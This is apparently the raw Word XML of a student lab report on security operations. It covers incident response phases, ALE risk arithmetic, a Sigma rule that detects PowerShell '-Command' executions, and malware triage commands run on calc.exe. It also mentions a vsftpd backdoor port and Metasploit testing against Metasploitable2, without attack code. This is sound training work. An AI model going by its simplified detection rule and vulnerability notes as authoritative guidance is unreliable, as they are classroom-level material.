      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="75A2CF68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3C3D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Control ID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DE9C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Domain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F224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20E1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Lab Relevance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="31EB6014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BC73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A.12.4.1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5406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Logging &amp; Monitoring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4593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Event logging for user activities and system events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0048D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 alerts.log capturing all system events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="76DD419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1A45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A.12.6.1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AD64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Technical Vulnerability </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN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C3E5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Timely identification and remediation of vulnerabilities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128F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OpenVAS scan of Metasploitable2, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>DefectDojo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="6107223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AA1C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A.13.1.1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D8B2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Network Security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FA5D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Network controls to protect information systems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2AFBB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Suricata IDS rules and </w:t>
            </w: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 xml:space="preserve"> IP blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="10CC596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8DA4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A.16.1.1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A62A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Incident Management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8905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Responsibilities and procedures for incident response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63F6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Documented IR report with SANS methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="123CC7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E49E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A.14.2.8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56D4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System Security Testing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DC7C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Testing of security functionality during development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71E9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Metasploit exploitation and vulnerability assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40AEA787" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075DCEA6" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1.3 Incident Response Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CD594C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1.3.1 Incident Response Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E78BC8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The SANS incident response lifecycle defines six phases that provide a structured approach to handling security incidents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EA42F7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739"/>
        <w:gridCol w:w="3519"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4C5A3318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79FE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Phase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E0DC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Key Activities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45AC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Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="698E44DE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6F42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1. Preparation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1BDE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Establish IR team, playbooks, communication plan, tools deployment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04905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, </w:t>
            </w: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>, Suricata deployed pre-incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="1C6A4C5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4E2D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2. Identification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E7AE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Detect and confirm incident via monitoring and alerts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D4630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 Rule 533 detected port changes; alerts.log analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="15741D4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EB81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3. Containment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E8023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Short-term containment to stop damage spread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A1854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 xml:space="preserve"> ban on 10.0.2.15 (24-hour duration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4C495B6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38FD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lastRenderedPageBreak/>
              <w:t>4. Eradication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3338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Remove malware, close vulnerabilities, patch systems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BBF5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Patch </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>, disable backdoor port 6200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="651313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3771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5. Recovery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CD24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Restore systems, monitor for re-infection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B994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Verify services restored, monitor </w:t>
            </w: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 for residual alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="6BC6F6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2DAC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6. Lessons Learned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EC44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Post-incident review, documentation, improvement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BB68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This report documents findings and recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AFA8775" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082B6C73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1.3.2 SOC Workflows and Playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC1C32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Security Operations </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SOC) workflows define standardized procedures for handling alerts. An effective playbook for FTP backdoor exploitation includes: (1) alert triage to confirm true positive, (2) isolation of affected system, (3) forensic artifact collection, (4) threat intelligence correlation with MITRE ATT&amp;CK, (5) executive notification, and (6) remediation tracking in a vulnerability management platform such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DefectDojo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71026847" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04675BE4" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1.4 Risk Management Advanced Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3CE31E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1.4.1 Quantitative vs Qualitative Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1AC99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Qualitative risk assessment uses descriptive scales (Low/Medium/High/Critical) to prioritize risks based on expert judgment. It is faster but subjective. Quantitative risk assessment assigns monetary values to risks using formulas, providing objective, financial justification for security investments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA733FC" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B82328D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1.4.2 Annualized Loss Expectancy (ALE) Calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA0332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The standard formula for quantitative risk is: ALE = SLE x ARO, where SLE (Single Loss Expectancy) is the monetary loss from a single incident, and ARO (Annualized Rate of Occurrence) is the expected frequency per year.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B962F1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2393"/>
        <w:gridCol w:w="2469"/>
        <w:gridCol w:w="1402"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="0BED40DE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57FD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6D94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Formula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9BDF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Ransomware Scenario Value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9E32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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="02718B6B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E405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Asset Value (AV)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8271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Estimated value of the asset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FBDF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$50,000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7CA8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$50,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5F3595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E2A5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Exposure Factor (EF)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B145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% of asset value lost per incident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90C9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4469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0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="2DF7369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31CE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Single Loss Expectancy (SLE)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8072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SLE = AV x EF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7697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$50,000 x 0.20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4DAB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$10,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3B3B5B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6C4E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lastRenderedPageBreak/>
              <w:t>Annualized Rate of Occurrence (ARO)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BCD2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Expected frequency per year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9E36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0.2 (once in 5 years)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4B90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0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5067FA1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420C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Annualized Loss Expectancy (ALE)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AF49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ALE = SLE x ARO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5635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$10,000 x 0.2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227A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$2,000/year</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FF369E7" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7832994F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Interpretation: The organization can justify spending up to $2,000 annually on ransomware controls (e.g., backups, endpoint protection) before the cost exceeds the risk value. Investments beyond this threshold require additional business justification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48305619" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0163D43A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1.4.3 Risk Matrix — Ransomware Scenario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618"/>
        <w:gridCol w:w="1164"/>
        <w:gridCol w:w="1543"/>
        <w:gridCol w:w="1152"/>
        <w:gridCol w:w="1311"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="7DA49798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1720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Likelihood \ Impact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1A41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Negligible (1)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1928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Minor (2)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EFC0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Moderate (3)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7F1E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Major (4)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84F3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Critical (5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4BFC6245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8AA8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Almost Certain (5)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24D0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15BB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9078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15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1890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1942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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="06E4FDD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2D85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Likely (4)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180C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72F7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4866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5F09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CC24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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="17126E1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A42B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Possible (3)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D859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B1DB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0CFB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DD3E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7541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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5EEABFA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56F5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Unlikely (2)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D842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2A70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E847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DC48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8E7A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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4F6ED3B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6BA3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Rare (1)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390D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7C06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CE96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3519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EC02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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69BCDFC1" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE0EBDF" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ransomware Scenario Score: Likelihood = Possible (3) x Impact = Major (4) = Risk Score 12 (HIGH). This justifies priority remediation investment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C58E0D" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5D2099" w14:textId="77777777" w:rsidR="00F03C65" w:rsidRDefault="00F03C65">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE73981" w14:textId="46BF1388" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PART 2: PRACTICAL APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A95C6DB" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFA93DA" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.1 Threat Hunting — Sigma Rule &amp; Elastic Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E06F94D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2.1.1 Sigma Rule for PowerShell Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C96B00E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Sigma is a generic signature format for SIEM systems that allows security analysts to write detection rules in a vendor-neutral format. The following rule detects suspicious PowerShell command execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECBB97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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E553AB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title: Suspicious PowerShell Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC7895B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id: 7a8b9c0d-1e2f-3a4b-5c6d-7e8f9a0b1c2d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED57C8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status: experimental</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D4077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description: Detects suspicious PowerShell command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAEE088" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>logsource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8B04D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  category: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>process_creation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AC04D37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  product: windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F2F9D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detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B284CF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  selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9DCCE4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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Image|endswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: '\\powershell.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA42E9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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CommandLine|contains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: '-Command'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175B6B1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  condition: selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE7A2B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level: high</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1A39A" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137E3EF0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2.1.2 Threat Hunting Query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708"/>
        <w:gridCol w:w="2221"/>
        <w:gridCol w:w="3250"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="25BE8917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1378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Timestamp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D2F8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5527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Command Line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8916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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="1A4A3080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DFB9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2026-05-29 00:06:21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9322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powershell.exe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5A1A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-Command Write-Host Test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83F1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Suspicious execution — simulated test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="63849AC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366B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2026-05-29 00:10:15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8F1AB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cscli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C0FE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decisions add --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.0.2.15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9EDCD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 xml:space="preserve"> decision — logged by </w:t>
            </w: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 Rule 5402</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="0E3E3BE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1C15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2026-05-29 00:13:42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22D26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suricata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AD3D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-c </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>suricata.yaml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> eth0 -D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E7C9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IDS daemon started — logged by </w:t>
            </w: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 Rule 5402</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="048D6D68" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AAE9C0" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2 Malware Analysis Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D642B6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 xml:space="preserve">2.2.1 Static Analysis with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>REMnux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71CA49C2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Static analysis examines malware without executing it, using tools to extract strings, identify file structure, and detect packed or obfuscated code. The strings command extracts human-readable text from binary files, revealing hardcoded URLs, registry keys, API calls, and command strings that indicate malicious intent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787C8B3D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120"/>
        <w:gridCol w:w="2560"/>
        <w:gridCol w:w="3245"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="45F9EE45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6956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F509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536A1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A389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Expected Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="165AE95E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698B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strings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E9C6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strings calc.exe &gt; output.txt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2B3B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Extract readable strings from binary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487C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Windows API calls, DLL names, version info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="649C7D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77478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peframe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BF7B5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peframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> calc.exe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ACBF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PE file structure analysis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FD49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Import table, section headers, entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="178D14C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9ABD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371D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file calc.exe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3FBA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Identify file type and architecture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B3E9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PE32 executable for MS Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3413341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2DBC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md5sum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53D3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md5sum calc.exe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9AF4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Generate file hash for threat intel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7451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Hash for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>/Hybrid Analysis lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FC225ED" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3635F18E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b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.2.2 Dynamic Analysis — Hybrid Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80A31C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Dynamic analysis executes the sample in a controlled sandbox environment and observes runtime </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> including file system changes, registry modifications, network connections, and process creation. Hybrid Analysis (hybrid-analysis.com) provides automated sandbox execution with MITRE ATT&amp;CK mapping and IOC extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FE50CC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528"/>
        <w:gridCol w:w="3369"/>
        <w:gridCol w:w="2314"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="45804991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E83F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Analysis Type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97D1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187F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Key Findings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5A050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MITRE Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="49389932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31FF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Static — Strings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DE380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REMnux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> strings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D9C1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DLL imports, Windows API calls, version metadata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ACC9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T1027 — Obfuscated Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="499ADB0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9FE2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Static — PE Structure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8536B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peframe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5189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Section entropy, import table, compile timestamp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2E630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T1045 — Software Packing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="2A2B6EE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0F48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Dynamic — Sandbox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0E0B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Hybrid Analysis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99CE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Network callbacks, registry writes, process injection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439D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T1055 — Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="6B1BC3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A7B8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Hash Lookup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2655A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VirusTotal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7101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Detection ratio, known malware family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095B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T1036 — Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="233A2065" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F97CC4" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Vulnerability Management Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093415EA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2.3.1 OpenVAS Scan — Metasploitable2</w:t>
